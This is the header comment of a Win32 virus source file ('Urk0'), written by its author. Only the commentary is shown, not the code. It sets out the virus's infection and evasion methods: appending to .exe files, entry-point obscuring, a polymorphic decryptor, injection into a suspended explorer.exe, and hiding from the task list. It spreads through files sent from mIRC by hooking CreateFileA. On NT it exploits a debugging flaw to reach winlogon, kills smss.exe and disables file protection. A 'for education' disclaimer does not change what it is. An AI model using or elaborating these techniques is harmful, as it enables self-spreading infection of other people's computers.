;THIS IS A VIRUS SOURCE CODE.NOW,THIS FILE ITS NOT DANGER.IM NOT RESPONSABLE OF DAMAGES
;IN CASE YOU COMPILE AND LINK IT TO CREATE A EXECUTABLE.THIS CODE IS ONLY FOR ENTERTAIMENT
;AND EDUCATION.
;I KNOW THIS CODE COULD TO HAVE (AND IM 99% SURE IT HAS) BUGS. I CODED IT ONLY FOR 
;FUN, I NO WANT THIS VIRUS INFECTED COMPUTERS UNLESS YOU DID IT FOR UR ELECTION SO
;IM NOT REALLY WORRIED COZ THIS VIRUS IS NOT DONE FOR CORRUPT A SYSTEM.  
;
;win32.Urk0 (Lady Marian 3)
;This is a Win32 virus.
;
;Win9x:
;It uses a method that i havent seen in other viruses.Second part of virus(where it 
;polymorphs decryptor,infects,...) is descrypted and copied directly to other process
;that previously it creates(ill try it was a process created from a random file but for
;now it do it with explorer.exe) suspended.Then it unprotect mem of primary module of
;process with VirtualProtectEx and overwrite process mem with its code since entrypoint
;of new process.Then we reanude thread of created process so virus is executed in other 
;process.This can be made MAX_DEPTH times.Explorer creates other process and inject there 
;its code,and again and again and again...for MAX_DEPTH times.
;I think this difficults emulation and debugging.In addition if a 
;memory monitor detects a virus behaviour in memory it detects virus as other file
;(for now explorer.exe).
;Note virus never infects explorer.exe in disk,only in memory,so if virus is searched in 
;explorer.exe it is not found.In addition when i create new process i pass 
;CREATE_NEW_PROCESS_GROUP flag so new process is created without father...
;suppostly there isnt relation between creator process and new process.  
;In addition when virus is executing in explorer.exe it calls to RegisterServiceProcess
;so user doesnt see two explorer.exe in task list.
;With this method we return the control to host fastly becoz slow part of virus is executed
;currently with host becoz it is executing in explorer.exe where we are injected our code.
;First part of virus is encrypted.Decryptor is polimorphed.Key is changed with each generation.
;Polymorphic engine its not very complex.It interchanges registers used and inserts 
;trash instructions.Trash uses recursively itself so we can find trash in this manner:
;
;xor reg32a,imm32a___
;add reg32b,imm32b_  |
;cli               | |
;clc               | |
;sub reg32b,imm32b_| |
;cli                 |
;cpuid               |
;...			   |
;xor reg32a,imm32a___|
;...
;
;I wanna do it better with a v2.0 of the virus :P
;Second part is encrypted with random key.Decryptor its not poly.However,virus doesnt
;modify its code directly becoz it,while is injecting code to explorer.exe,is 
;unencrypting bytes before injecting.
;It uses EPO method too.Insert a jmp(and ill insert some antidebugging trickz too)
;in entrypoint of infected file(later it restores bytes overwrited).
;Apis are gotten by CRC.
;For infection it adds itself at end of last section.Increase size of file infected.
;It only infects .exe files.
;For now Urk0 doesnt have payload(i dont know if i ll add it :-m )
;In addition Urk0 has two manners of infection.It can infect files with explorer code
;encrypted or withouth encrypting.If it isnt encrypted it have per-process characteristics.
;It works in the same manner but in addition it hooks CreateFileA api.
;It always infects mirc.exe file with per-process characteristics becoz mirc.exe use 
;CreateFileA to open files that it will send(with dcc) so ill infect files before sending
;and in this manner virus will arrive other computer ;)(With mirc.exe and others similar).
;If you read this code you will see i have spend a lot of bytes that i could have not
;spend it,becoz for now i have not optimizated the code.I must optimizate it and
;optmizate poly engine.
;Structure of code:
;
;      --------------------------------------SVirus
;      -----------------------SCode
;         (Entry point 2)
;         Code executed
;         after injecting
;         in explorer.exe
;         Encrypted with random. 
;	    Note if this part is
;         not encrypted some code
;         here can be executed 
;         before injecting to
;         explorer for 
;         perprocess propose
;      -----------------------ECode
;         (Entry point 1)
;         Decryptor of code since
;         Encrypted to EVirus		
;      -----------------------Encrypted
;         Here it creates process
;         explorer.exe and injects
;         code(unencrypting SCode
;         to ECode at same time it 
;         write each dword) to 
;         explorer.exe since entry
;         point of it.When it has
;         injected the code it reanude
;         explorer and infection part
;         and others important parts
;         are executed in explorer.exe
;         process.
;         Later it restore for EPO
;         overwrited bytes and jmp 
;         to host          
;      --------------------------------------EVirus
;
;WinNT:
;In NT machines virus works in a manner very different.In Nt,virus will try to get a 
;handle to winlogon.exe with full privileges,using a flaw in dbgss implemented in smss.exe
;(you can see debploit flaw in august archives,Nt focus,www.securiteam.com).Using this flaw
;we inject our code in winlogon.Note that with this flaw we have a problem,when we try to get
;a handle to winlogon with debploit method,winlogon will terminate when our program
;terminate too,becouse our program set as debugger of winlogon,and winlogon as debuggee,
;so if we attach winlogon,when we terminate,it will terminate too.For this reason,winlogon
;code will kill smss.exe.Ok,this is a dramatic solution,however i think system will work
;very well without smss.exe.Smss.exe loads winlogon.exe and user mode part of win32 ss 
;in memory,and when system hangs,it takes control and show typical blue screen.In addition,
;it have implemented dbgss so if we kill it,a lot of debugger will not run(mmm...is this a
;problem??? ;).I was working a lot of time in my system with smss.exe terminated and i think
;my system worked perfectly(i wasnt be able to use debuggers...only softice).
;well,when winlogon code kills smss.exe,it disables sfp with ratter and benny method(29a
;number 6).Later it gets a handle to explorer and injects the code there.In explorer,
;virus will infect current folder of explorer.exe in intervals of 60 seconds.
;Note virus use ModuleBase + 28h for infection mark.At this offset there are 5 reserved dwords
;in dos header.I think to put infection mark in this field is a few lame :P ... i could
;to have put it in second field of time date stamp or with others methods but im not worry
;for infection mark. 
;
;
;and that is all :)
;
;
;SORRY BECOZ MY ENGLISH LEVEL ITS VERY LOW SO I M SORRY IF YOU DONT UNDERSTAND SOME 
;EXPRESSIONS THAT I USE BADLY.HOWEVER ILL TRY TO WRITE BETTER I CAN :)
;
;I MUST TO APOLOGIZE TOO COZ MY BADLY MANNER OF PROGRAMMING. MY CODE IS NOT OPTIMIZED
;FOR FAST AND NOT OPTIMIZED FOR SIZE :P . IN ADDITION THIS IS A CRAZY CODE :S 
;REALLY,IF I HAD TO READ IT I WOULD BE VERY ANGRY WITH THE AUTHOR :P COZ PERHAPS THE CODE
;IS NOT VERY MUCH UNDERSTANDABLE. SORRY .
;
;
;THX TO:
;
;OF COURSE: